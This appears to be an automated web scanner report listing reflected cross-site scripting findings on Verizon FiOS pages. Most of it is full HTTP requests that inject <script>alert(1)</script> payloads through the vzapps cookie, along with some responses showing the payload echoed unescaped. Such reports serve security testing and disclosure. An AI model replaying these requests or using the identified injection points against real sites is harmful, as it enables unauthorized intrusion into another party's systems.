GET /Residential/FiOSInternet/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXfc928<script>alert(1)</script>80e25040c4e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b8b99'><script>alert(1)</script>47fb54bb178 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXb8b99'><script>alert(1)</script>47fb54bb178; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload ab07d<script>alert(1)</script>4c69398d6d5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXab07d<script>alert(1)</script>4c69398d6d5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f710f'><script>alert(1)</script>e2fd98d03b8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXf710f'><script>alert(1)</script>e2fd98d03b8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 57182 Expires: Sat, 20 Nov 2010 00:09:46 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:09:46 GMT Connection: close Set-Cookie: ContextInfo_State=TXf710f'><script>alert(1)</script>e2fd98d03b8; path=/ Set-Cookie: ContextInfo_LoopQual=; path=/
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 72540<script>alert(1)</script>7d82b6fd3cc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/Equipment/Equipment.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX72540<script>alert(1)</script>7d82b6fd3cc; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 217f0'><script>alert(1)</script>c757f2d9905 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/Equipment/Equipment.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX217f0'><script>alert(1)</script>c757f2d9905; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 8f35d<script>alert(1)</script>666a41a49d0 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/FAQ/FAQ.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX8f35d<script>alert(1)</script>666a41a49d0; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 114983 Expires: Sat, 20 Nov 2010 00:10:57 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:10:57 GMT Connection: close Set-Cookie: ContextInfo_State=TX8f35d<script>alert(1)</script>666a41a49d0; path=/ Set-Cookie: ContextInfo_LoopQual=; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 77bd6'><script>alert(1)</script>866fecce315 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/FAQ/FAQ.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX77bd6'><script>alert(1)</script>866fecce315; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 113390 Expires: Sat, 20 Nov 2010 00:09:44 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:09:44 GMT Connection: close Set-Cookie: ContextInfo_State=TX77bd6'><script>alert(1)</script>866fecce315; path=/ Set-Cookie: ContextInfo_LoopQual=; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 78bda'><script>alert(1)</script>c540e06163e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/Features/Features.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX78bda'><script>alert(1)</script>c540e06163e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="head">
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 6e62f<script>alert(1)</script>a74e7065845 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/Features/Features.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX6e62f<script>alert(1)</script>a74e7065845; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="head">
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e17ad'><script>alert(1)</script>33b4d098683 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXe17ad'><script>alert(1)</script>33b4d098683; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload af6d8<script>alert(1)</script>b1212cf33ee was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXaf6d8<script>alert(1)</script>b1212cf33ee; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d1de'><script>alert(1)</script>c5602c17654 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/Installation/Installation.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX8d1de'><script>alert(1)</script>c5602c17654; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 46d05<script>alert(1)</script>d1f2b7396b5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/Installation/Installation.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX46d05<script>alert(1)</script>d1f2b7396b5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 97b68<script>alert(1)</script>c16b73f542d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/Overview.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX97b68<script>alert(1)</script>c16b73f542d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ee786'><script>alert(1)</script>78ce639b9c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/Overview.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXee786'><script>alert(1)</script>78ce639b9c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 513ee<script>alert(1)</script>274881b5bf8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX513ee<script>alert(1)</script>274881b5bf8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 148890 Expires: Sat, 20 Nov 2010 00:12:18 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:12:18 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="head"><meta http-equiv="X-UA-Compatible ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TX513EE<SCRIPT>ALERT(1)</SCRIPT>274881B5BF8 </DIV> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c469d'><script>alert(1)</script>c411bde7de8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXc469d'><script>alert(1)</script>c411bde7de8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 148894 Expires: Sat, 20 Nov 2010 00:11:52 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:11:52 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="head"><meta http-equiv="X-UA-Compatible ...[SNIP]... <input type='hidden' id='locationInfo' value='TXC469D'><SCRIPT>ALERT(1)</SCRIPT>C411BDE7DE8 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3a42'><script>alert(1)</script>fbf87ca090d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
